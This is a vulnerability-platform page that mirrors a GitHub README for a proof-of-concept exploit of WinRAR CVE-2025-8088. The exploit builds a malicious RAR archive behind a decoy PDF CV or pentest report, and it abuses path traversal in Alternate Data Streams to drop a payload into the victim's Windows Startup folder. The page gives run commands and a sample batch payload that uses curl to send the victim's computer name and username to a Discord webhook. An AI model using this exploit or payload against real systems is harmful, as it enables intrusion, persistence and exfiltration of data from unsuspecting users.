漏洞平台

POC详情： 25736cf59e07314dd3d1fcda303a1364d23a0bb0

来源

https://github.com/techcorp/CVE-2025-8088-Exploit

关联漏洞

标题： WinRAR 安全漏洞 (CVE-2025-8088)
描述：WinRAR是WinRAR公司的一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。 WinRAR存在安全漏洞，该漏洞源于路径遍历问题，可能导致任意代码执行。

描述

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

介绍

# CVE-2025-8088 WinRAR Exploit 🔓

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

- The issue with a lot of the others is they do not embedd multiple ADS streams requiring either luck you have the right path traversal or know the exact username/extraction directory. 

<p align="center">
  <img src="https://github.com/pentestfunctions/best-CVE-2025-8088/blob/main/assets/winrar_exploit.gif?raw=true">
</p>

## 🚀 How It Works

1. Creates a Decoy Document 📄 - Generates professional-looking PDF (CV or pentest report)
2. Embeds Multiple ADS Streams 🔄 - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers ⚙️ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup 📂 - Attempts to write payload to Windows startup folder when extracted

## 🛠️ Usage
```bash
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088-Exploit.py
```
## ✏️ Payload Customization
Edit the payload to call a Discord webhook:

```bash
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
```

Replace YOUR_DISCORD_WEBHOOK_URL with your actual webhook URL.

## 🔄 Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (≤7.12)
2. Payload gets written to startup folder:
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot ➡️ payload executes automatically

## 📋 Requirements
- Windows OS 🪟
- Python 3.x 🐍
- WinRAR installed
- ReportLab library (pip install reportlab)

文件快照


 [4.0K]  /data/pocs/25736cf59e07314dd3d1fcda303a1364d23a0bb0
├── [4.0K]  assets
│   ├── [   1]  info.md
│   └── [7.8M]  winrar_exploit.gif
├── [ 29K]  CVE-2025-8088.py
├── [2.0K]  README.md
└── [  18]  requirements.txt

1 directory, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。